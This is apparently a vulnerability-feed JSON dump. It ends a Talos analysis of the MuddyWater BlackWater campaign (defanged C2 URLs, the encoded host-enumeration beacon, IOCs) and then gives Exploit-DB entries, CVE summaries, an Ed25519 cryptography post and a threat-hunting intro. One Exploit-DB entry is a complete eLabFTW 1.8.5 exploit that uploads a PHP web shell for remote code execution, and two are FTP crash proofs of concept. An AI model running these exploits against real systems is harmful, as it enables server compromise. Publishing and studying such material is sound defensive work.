beacon is \"hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script. \n \nNext, the script would enumerate the victim's machine. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information: \n\n\n * Operating system's name (i.e., the name of the machine)\n * Operating system's OS architecture\n * Operating system's caption\n * Computer system's domain\n * Computer system's username\n * Computer's public IP address\nThe only command that did not call WMI was for the \"System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash\", or the command to obtain the security system's MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were compromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file. A copy of the encoded command is shown below: \n \n\n \n \n hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE= \n \n \n\n \nOnce decoded, the output of the above command became clear: \n \n\n \n \n hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*\u00d0=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUP\u00d0=.*USER-PC\\admin*192.168.000.01\n\n### Conclusion\n\nIn addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to avoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial, as their underlying code base and implant functionality remained largely unchanged. However, while these changes were minimal, they were significant enough to avoid some detection mechanisms. Despite last month's report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group. \n\n\n### Indicators of compromise\n\n**Hashes** \n \n0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad \n9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7 \n0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2 \nA3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981 \n6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad \nBef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6 \nB2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93 \n4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60 \n576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf \n062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717 \n \n**URLs** \n \nhxxp://38[.]132[.]99[.]167/crf.txt \nhxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater \nhxxp://82[.]102[.]8[.]101/bcerrxy.php? \nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php \nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php \nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/ \nhxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df \nhxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh \nhxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG \n \n\n\n### Coverage \n\n \nDoc.Dropper.Pwshell::malicious.tht.talos \n \n\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/uR3afWKSJg4)", "modified": "2019-05-20T12:06:13", "published": "2019-05-20T12:06:13", "id": "TALOSBLOG:8C3C1932ADC9233AFC7A07EF3EF684D5", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uR3afWKSJg4/recent-muddywater-associated-blackwater.html", "type": "talosblog", "title": "Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2019-05-20T14:21:00", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "EDB-ID:46876", "href": "https://www.exploit-db.com/exploits/46876", "type": "exploitdb", "title": "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)", "sourceData": "#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-18\r\n#Vendor Homepage: http://bpftpserver.com/\r\n#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download\r\n#Tested Version: 2019.0.0.50\r\n#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: BulletProof_Storage_Server_2019.0.0.50.py\r\n#2.- Open bullet_storage.txt and copy content to clipboard\r\n#3.- Open BulletProof FTP Server\r\n#4.- Select \"Settings\" > \"Advanced\"\r\n#5.- Enable \"Override Storage-Path\" and Paste Clipboard\r\n#6.- Click on \"Save\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 500\r\n\r\nf = open('bullet_storage.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46876"}, {"lastseen": "2019-05-20T12:19:41", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "EDB-ID:46875", "href": "https://www.exploit-db.com/exploits/46875", "type": "exploitdb", "title": "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)", "sourceData": "#Exploit Title: BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Discovery Date: 2019-05-18\r\n#Vendor Homepage: http://bpftpserver.com/\r\n#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download\r\n#Tested Version: 2019.0.0.50\r\n#Tested on: Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: BulletProof_DNS_Server_2019.0.0.50.py\r\n#2.- Open bullet_storage.txt and copy content to clipboard\r\n#3.- Open BulletProof FTP Server\r\n#4.- Select \"Settings\" > \"Protocols\" > \"FTP\" > \"Firewall\"\r\n#5.- Enable \"DNS Address\" and Paste Clipboard\r\n#6.- Click on \"Test\"\r\n#7.- Crashed\r\n\r\ncod = \"\\x41\" * 700\r\n\r\nf = open('bullet_dns.txt', 'w')\r\nf.write(cod)\r\nf.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46875"}, {"lastseen": "2019-05-20T12:20:03", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-20T00:00:00", "published": "2019-05-20T00:00:00", "id": "EDB-ID:46869", "href": "https://www.exploit-db.com/exploits/46869", "type": "exploitdb", "title": "eLabFTW 1.8.5 - Arbitrary File Upload / Remote Code Execution", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary\r\nFile Upload / RCE\r\n# Date : 5/18/19\r\n# Exploit Author : liquidsky (JMcPeters)\r\n# Vulnerable Software : eLabFTW 1.8.5\r\n# Vendor Homepage : https://www.elabftw.net/\r\n# Version : 1.8.5\r\n# Software Link : https://github.com/elabftw/elabftw\r\n# Tested On : Linux / PHP Version 7.0.33 / Default\r\ninstallation (Softaculous)\r\n# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove\r\n#\r\n# Greetz : wetw0rk, offsec ^^\r\n#\r\n# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads\r\nvia the /app/controllers/EntityController.php component.\r\n# This may result in remote command execution. An attacker can use a\r\nuser account to fully compromise the system using a POST request.\r\n# This will allow for PHP files to be written to the web root, and for\r\ncode to execute on the remote server.\r\n#\r\n# Notes: Once this is done a php shell will drop at https://[target\r\nsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long\r\nalphanumeric].php5?e=whoami\r\n# You will have to visit the uploads directory on the site to see what\r\nthe name is. However there is no protection against directory listing.\r\n# So this can be done by an attacker remotely.\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs4\r\nrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)\r\nimport sys\r\nimport time\r\n\r\nprint \"+-------------------------------------------------------------+\"\r\nprint\r\nprint \"- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE\"\r\nprint\r\nprint \"- Discovery / PoC by liquidsky (JMcPeters) ^^\"\r\nprint\r\nprint \"+-------------------------------------------------------------+\"\r\n\r\ntry:\r\n\r\ntarget = sys.argv[1]\r\nemail = sys.argv[2]\r\npassword = sys.argv[3]\r\ndirectory = sys.argv[4]\r\n\r\nexcept IndexError:\r\n\r\n print\r\nprint \"- Usage: %s <target> <email> <password> <directory>\" % sys.argv[0]\r\nprint \"- Example: %s incidentsecurity.com user@email.com mypassword\r\nelabftw\" % sys.argv[0]\r\n print\r\nsys.exit()\r\n\r\n\r\nproxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}\r\n\r\n# The payload to send\r\ndata = \"\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x37\"\r\ndata += \"\\x32\\x31\\x36\\x37\\x35\\x39\\x38\\x31\\x31\\x30\\x38\\x37\\x34\\x35\\x39\"\r\ndata += \"\\x34\\x31\\x31\\x31\\x36\\x33\\x30\\x33\\x39\\x35\\x30\\x37\\x37\\x0d\\x0a\"\r\ndata += \"\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x44\\x69\\x73\\x70\\x6f\\x73\\x69\"\r\ndata += \"\\x74\\x69\\x6f\\x6e\\x3a\\x20\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\"\r\ndata += \"\\x3b\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x75\\x70\\x6c\\x6f\\x61\\x64\\x22\"\r\ndata += \"\\x0d\\x0a\\x0d\\x0a\\x74\\x72\\x75\\x65\\x0d\\x0a\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x37\\x32\\x31\\x36\\x37\\x35\"\r\ndata += \"\\x39\\x38\\x31\\x31\\x30\\x38\\x37\\x34\\x35\\x39\\x34\\x31\\x31\\x31\\x36\"\r\ndata += \"\\x33\\x30\\x33\\x39\\x35\\x30\\x37\\x37\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\"\r\ndata += \"\\x6e\\x74\\x2d\\x44\\x69\\x73\\x70\\x6f\\x73\\x69\\x74\\x69\\x6f\\x6e\\x3a\"\r\ndata += \"\\x20\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x3b\\x20\\x6e\\x61\\x6d\"\r\ndata += \"\\x65\\x3d\\x22\\x69\\x64\\x22\\x0d\\x0a\\x0d\\x0a\\x34\\x0d\\x0a\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x37\\x32\\x31\"\r\ndata += \"\\x36\\x37\\x35\\x39\\x38\\x31\\x31\\x30\\x38\\x37\\x34\\x35\\x39\\x34\\x31\"\r\ndata += \"\\x31\\x31\\x36\\x33\\x30\\x33\\x39\\x35\\x30\\x37\\x37\\x0d\\x0a\\x43\\x6f\"\r\ndata += \"\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x44\\x69\\x73\\x70\\x6f\\x73\\x69\\x74\\x69\"\r\ndata += \"\\x6f\\x6e\\x3a\\x20\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x3b\\x20\"\r\ndata += \"\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x74\\x79\\x70\\x65\\x22\\x0d\\x0a\\x0d\\x0a\"\r\ndata += \"\\x65\\x78\\x70\\x65\\x72\\x69\\x6d\\x65\\x6e\\x74\\x73\\x0d\\x0a\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x37\\x32\\x31\"\r\ndata += \"\\x36\\x37\\x35\\x39\\x38\\x31\\x31\\x30\\x38\\x37\\x34\\x35\\x39\\x34\\x31\"\r\ndata += \"\\x31\\x31\\x36\\x33\\x30\\x33\\x39\\x35\\x30\\x37\\x37\\x0d\\x0a\\x43\\x6f\"\r\ndata += \"\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x44\\x69\\x73\\x70\\x6f\\x73\\x69\\x74\\x69\"\r\ndata += \"\\x6f\\x6e\\x3a\\x20\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x3b\\x20\"\r\ndata += \"\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x22\\x3b\\x20\\x66\\x69\"\r\ndata += \"\\x6c\\x65\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x70\\x6f\\x63\\x33\\x2e\\x70\\x68\"\r\ndata += \"\\x70\\x35\\x22\\x0d\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x54\\x79\"\r\ndata += \"\\x70\\x65\\x3a\\x20\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\"\r\ndata += \"\\x2f\\x78\\x2d\\x70\\x68\\x70\\x0d\\x0a\\x0d\\x0a\\x3c\\x3f\\x70\\x68\\x70\"\r\ndata += \"\\x20\\x65\\x63\\x68\\x6f\\x20\\x73\\x68\\x65\\x6c\\x6c\\x5f\\x65\\x78\\x65\"\r\ndata += \"\\x63\\x28\\x24\\x5f\\x47\\x45\\x54\\x5b\\x27\\x65\\x27\\x5d\\x2e\\x27\\x20\"\r\ndata += \"\\x32\\x3e\\x26\\x31\\x27\\x29\\x3b\\x20\\x3f\\x3e\\x0d\\x0a\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\"\r\ndata += \"\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x37\\x32\\x31\\x36\"\r\ndata += \"\\x37\\x35\\x39\\x38\\x31\\x31\\x30\\x38\\x37\\x34\\x35\\x39\\x34\\x31\\x31\"\r\ndata += \"\\x31\\x36\\x33\\x30\\x33\\x39\\x35\\x30\\x37\\x37\\x2d\\x2d\\x0d\\x0a\"\r\n\r\ns = requests.Session()\r\n\r\nprint \"[*] Visiting eLabFTW Site\"\r\nr = s.get('https://' + target + '/' + directory +\r\n'/login.php',verify=False, proxies=proxies)\r\nprint \"[x]\"\r\n\r\n# Grabbing token\r\nhtml_bytes = r.text\r\nsoup = bs4(html_bytes, 'lxml')\r\ntoken = soup.find('input', {'name':'formkey'})['value']\r\n\r\nvalues = {'email': email,\r\n 'password': password,\r\n 'formkey': token,}\r\n\r\ntime.sleep(2)\r\n\r\nprint \"[*] Logging in to eLabFTW\"\r\n\r\nr = s.post('https://' + target + '/' + directory +\r\n'/app/controllers/LoginController.php', data=values, verify=False,\r\nproxies=proxies)\r\n\r\nprint \"[x] Logged in :)\"\r\n\r\ntime.sleep(2)\r\n\r\nsessionId = s.cookies['PHPSESSID']\r\n\r\nheaders = {\r\n #POST /elabftw/app/controllers/EntityController.php HTTP/1.1\r\n #Host: incidentsecurity.com\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux i686; rv:52.0)\r\nGecko/20100101 Firefox/52.0\",\r\n \"Accept\": \"application/json\",\r\n \"Accept-Language\": \"en-US,en;q=0.5\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n #Referer: https://incidentsecurity.com\r\n \"Cache-Control\": \"no-cache\",\r\n \"X-Requested-With\": \"XMLHttpRequest\",\r\n \"Content-Length\": \"588\",\r\n \"Content-Type\": \"multipart/form-data;\r\nboundary=---------------------------72167598110874594111630395077\",\r\n \"Connection\": \"close\",\r\n \"Cookie\": \"PHPSESSID=\" + sessionId + \";\" + \"token=\" + token\r\n}\r\n\r\nprint \"[*] Sending payload...\"\r\nr = s.post('https://' + target + '/' + directory +\r\n'/app/controllers/EntityController.php',verify=False, headers=headers,\r\ndata=data, proxies=proxies)\r\nprint \"[x] Payload sent\"\r\nprint\r\nprint \"Now check https://%s/%s/uploads\" % (target, directory)\r\nprint \"Your php shell will be there under a random name (.php5)\"\r\nprint\r\nprint \"i.e https://[vulnerable\r\nsite]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46869"}], "cve": [{"lastseen": "2019-05-20T10:39:37", "bulletinFamily": "NVD", "description": "eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.", "modified": "2019-05-19T20:29:00", "published": "2019-05-19T20:29:00", "id": "CVE-2019-12185", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12185", "title": "CVE-2019-12185", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-18T10:34:06", "bulletinFamily": "NVD", "description": "ATutor through 2.2.4 is vulnerable to arbitrary file uploads via the mods/_core/backups/upload.php (aka backup) component. This may result in remote command execution. An attacker can use the instructor account to fully compromise the system using a crafted backup ZIP archive. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.", "modified": "2019-05-17T18:29:00", "published": "2019-05-17T18:29:00", "id": "CVE-2019-12170", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12170", "title": "CVE-2019-12170", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-18T10:34:06", "bulletinFamily": "NVD", "description": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.", "modified": "2019-05-17T13:29:00", "published": "2019-05-17T13:29:00", "id": "CVE-2019-12086", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12086", "title": "CVE-2019-12086", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-18T10:34:07", "bulletinFamily": "NVD", "description": "IBM WebSphere Application Server 8.5 and 9.0 could allow a remote attacker to execute arbitrary code on the system with a specially-crafted sequence of serialized objects from untrusted sources. IBM X-Force ID: 160445.", "modified": "2019-05-17T12:29:03", "published": "2019-05-17T12:29:03", "id": "CVE-2019-4279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-4279", "title": "CVE-2019-4279", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-18T10:34:07", "bulletinFamily": "NVD", "description": "IBM Cloud Private Kubernetes API server 2.1.0, 3.1.0, 3.1.1, and 3.1.2 can be used as an HTTP proxy to not only cluster internal but also external target IP addresses. IBM X-Force ID: 158145.", "modified": "2019-05-17T12:29:03", "published": "2019-05-17T12:29:03", "id": "CVE-2019-4119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-4119", "title": "CVE-2019-4119", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-18T10:34:06", "bulletinFamily": "NVD", "description": "Buffer overflow vulnerability in system firmware for Intel(R) Xeon(R) Processor D Family, Intel(R) Xeon(R) Scalable Processor, Intel(R) Server Board, Intel(R) Server System and Intel(R) Compute Module may allow a privileged user to potentially enable escalation of privilege and/or denial of service via local access.", "modified": "2019-05-17T12:29:01", "published": "2019-05-17T12:29:01", "id": "CVE-2019-0119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0119", "title": "CVE-2019-0119", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "filippoio": [{"lastseen": "2019-05-19T18:19:32", "bulletinFamily": "blog", "description": "![Using Ed25519 signing keys for encryption](https://blog.filippo.io/content/images/2019/05/Screen-Shot-2019-05-18-at-12.24.25.png)\n\n[@Benjojo12](<https://twitter.com/Benjojo12>) and I are building [an encryption tool](<https://docs.google.com/document/d/11yHom20CrsuX8KQJXBBw04s80Unjv8zCg_A7sPAX_9Y>) that will also support SSH keys as recipients, because everyone effectively already publishes their SSH public keys [on GitHub](<https://github.com/FiloSottile.keys>).\n\nFor [RSA keys](<https://tools.ietf.org/html/rfc8332>), this is [dangerous](<https://eprint.iacr.org/2011/615.pdf>) but straightforward: a PKCS#1 v1.5 signing key is the same as an OAEP encryption key.\n\n[Ed25519 keys](<https://tools.ietf.org/html/draft-ietf-curdle-ssh-ed25519-ed448-08#section-4>), though, are specifically made to be used with [EdDSA, the Edwards-Curve Digital Signature Algorithm](<https://tools.ietf.org/html/rfc8032>). To encrypt to them we'll have to choose between converting them to X25519 keys to do Ephemeral-Static Diffie-Hellman, and devising our own Diffie-Hellman scheme that uses Ed25519 keys.\n\nWhile the latter is a totally viable strategy\u2014you can do Ephemeral-Static Diffie-Hellman on twisted Edwards curves\u2014I wanted to reuse the X25519 codepath, so I opted for the former.\n\nFirst, we need to understand the difference between Ed25519 and X25519. For that I recommend [_Montgomery curves and their arithmetic_](<https://eprint.iacr.org/2017/212.pdf>) by Craig Costello and Benjamin Smith, which is where I learned most of the underlying mechanics of Montgomery curves. The high level summary is that **the twisted Edwards curve used by Ed25519 and the Montgomery curve used by X25519 are _birationally equivalent_**: you can convert points from one to the other, and they behave the same way. The main difference is that on Montgomery curves you can use the Montgomery ladder to do scalar multiplication of x coordinates, which is fast, constant time, and sufficient for Diffie-Hellman. Points on the Edwards curve are usually referred to as `(x, y)`, while points on the Montgomery curve are usually referred to as `(u, v)`.\n\nRFC 7748 conveniently [provides](<https://tools.ietf.org/html/rfc7748#page-5>) the formulas to map `(x, y)` Ed25519 Edwards points to `(u, v)` Curve25519 Montgomery points and vice versa.\n \n \n (u, v) = ((1+y)/(1-y), sqrt(-486664)*u/x)\n (x, y) = (sqrt(-486664)*u/v, (u-1)/(u+1))\n \n\nSo that's what a [X25519 public key](<https://tools.ietf.org/html/rfc7748#section-5>) is: a u coordinate on the Curve25519 Montgomery curve obtained by multiplying the basepoint by a secret scalar, which is the private key. An [Ed25519 public key](<https://tools.ietf.org/html/rfc8032#section-5.1.5>) instead is the compressed encoding of a `(x, y)` point on the Ed25519 Edwards curve obtained by multiplying the basepoint by a secret scalar derived from the private key. (An Ed25519 private key is hashed to obtained two secrets, the first is the secret scalar, the other is used elsewhere in the signature scheme.)\n\nIf we use the same secret scalar to calculate both an Ed25519 and an X25519 public key, we will get two points that are birationally equivalent, so we can convert from one to the other with the maps above. There is one catch though: you might have noticed that **while we have both x and y coordinates for the Ed25519 public key, we only have the u coordinate for the X25519 key**. That's because u coordinates are enough to do Diffie-Hellman (which is the core insight of Curve25519).\n\nFor every valid u coordinate, there are two points on the Montgomery curve. The same is true of y coordinates and the Edwards curve. (When you use the birational map, y coordinates map to u coordinates and vice-versa.) That's why we can encode Ed25519 public keys as a y coordinate and a \"sign\" bit in place of the full x coordinate.\n\nThis means that for each X25519 public key, there are two possible secret scalars (`k` and `-k`) and two equivalent Ed25519 public keys (with sign bit 0 and 1, also said to be one the negative of the other).\n\nBy the way, this all works because the basepoints of the Montgomery and Edwards curves are equivalent. Interestingly enough, the spec made a mistake and picked the wrong v coordinate for the Montgomery basepoint, so that the Montgomery basepoint maps to the negative of the Edwards basepoint. [It's fixed in an errata](<https://www.rfc-editor.org/errata/eid4730>) but no one cares about Montgomery v coordinates anyway.\n\nIt should be mentioned that there is precedent for converting keys between the two curves: [Signal's XEd25519](<https://signal.org/docs/specifications/xeddsa/>). They do the opposite of what we want to do though, they use an X25519 key for EdDSA. That comes with an issue: an X25519 public key does not carry a v coordinate, so it can map to two Ed25519 keys. They solve it by defining the Edwards point sign bit to be 0, and then negating the Edwards secret scalar if it would generate a point with positive sign. (It also comes with more issues due to not having the other secret that you derive from an EdDSA private key, but that's out of scope. I like the diagram in [this blog post](<https://blog.mozilla.org/warner/2011/11/29/ed25519-keys/>) if you are curious.)\n\nI recommend reading both [section 2.3 of the XEdDSA spec](<https://signal.org/docs/specifications/xeddsa/#elliptic-curve-conversions>) and [this StackExchange answer](<https://crypto.stackexchange.com/a/62881/6740>) if things don't feel clear at this point.\n\nGetting back to our use case, it turns out that it's pretty easy to use an Ed25519 public key for X25519, because **an Ed25519 public key maps to a single X25519 public key**, and the Ed25519 secret scalar will be one of the two valid X25519 private keys for that public key.\n\nTo encrypt, we take the y coordinate of the Ed25519 public key and we convert it to a Montgomery u coordinate, which we use as an [X25519](<https://tools.ietf.org/html/rfc7748#section-5>) public key for Ephemeral-Static Diffie-Hellman.\n \n \n u = (1 + y) / (1 - y)\n \n ephemeral_secret = read(/dev/urandom, 32)\n ephemeral_share = X25519(ephemeral_secret, BASEPOINT)\n shared_secret = X25519(ephemeral_secret, u)\n \n\nTo decrypt, we derive the secret scalar [according to the Ed25519 spec](<https://tools.ietf.org/html/rfc8032#section-5.1.5>), and simply use it as an X25519 private key in Ephemeral-Static Diffie-Hellman.\n \n \n secret_scalar = SHA-512(Ed25519_key)[:32]\n shared_secret = X25519(secret_scalar, ephemeral_share)\n \n\nThe two peers might end up with different v coordinates, if they were to calculate them, but in X25519 the shared secret is just the u coordinate, so no one will notice.\n\nWhat remains open for future work is checking for cross-protocol attacks. The only one that really concerns me is if a partial decryption oracle (where you can submit files to an endpoint and it will tell you if they decrypt successfully) allows generating an Ed25519 signature that can be used to log in to an SSH server. I can't see such an attack, but if you can, [let me know on Twitter](<https://twitter.com/FiloSottile>).\n\nP.S. Looks like libsodium already [supports this kind of Ed25519 to Curve25519 conversion](<https://libsodium.gitbook.io/doc/advanced/ed25519-curve25519>), which is great as it makes it easy for languages with libsodium bindings (most of them) to implement _age_, and it gets us something to test against.\n\n> It turns out it's fairly easy to reuse an Ed25519 key for X25519. \n \nI wrote a quick blog post explaining the difference between the two, and how you can convert from one to the other.<https://t.co/ihMNdOoxGC>\n> \n> -- Filippo Valsorda (@FiloSottile) [May 18, 2019](<https://twitter.com/FiloSottile/status/1129786275924516864?ref_src=twsrc%5Etfw>)", "modified": "2019-05-18T16:25:20", "published": "2019-05-18T16:25:20", "id": "FILIPPOIO:4F3C5750E7269743A82B5C691D398E11", "href": "https://blog.filippo.io/using-ed25519-keys-for-encryption/", "type": "filippoio", "title": "Using Ed25519 signing keys for encryption", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2019-05-18T02:20:22", "bulletinFamily": "blog", "description": "Modern-day cyberattacks keep growing in sophistication and sheer volume. This dynamic makes it virtually impossible to detect and block all attacks using the traditional methods of comparing incoming requests to known attack signatures. To effectively operate in this new aggressive cyberthreat environment, it is paramount that IT operations, developers, and DevSecOps adopt a proactive defense mindset. Threat hunting is all about having that powerfully proactive mindset. The underlying goal of threat hunting is to detect, evaluate, and mitigate threats before they can impact core operational functions.\n\n![](https://cdn-images-1.medium.com/max/1024/0*tbHqypX_ydvA2JLU)Threats can hide inside, taking their time to infiltrate and attack.\n\nIn this post, we will suggest a methodology of remediating threats based on the technique called Threat Modeling.\n\n### Threat Hunting Methodology\n\nFrom a 1000-foot view, threat hunting methodology is not hard. As with most critical situations, your time is scarce and the information is insufficient. The methodology follows an Assess, Prioritize, Address flow.\n\nIt goes something like this:\n\n * Understand new threats\n * Assess potential impact, or risk, of the new threats\n * Model the threats to determine where they may impact the software or the business process and prioritize risks\n * Implement protection measures and mitigating controls\n * Assess how effective the protection is\n * Repeat periodically as the threat landscape and your infrastructure change\n\nLets dive in.\n\n### New Generation of Threats for Cybersecurity\n\nOnly 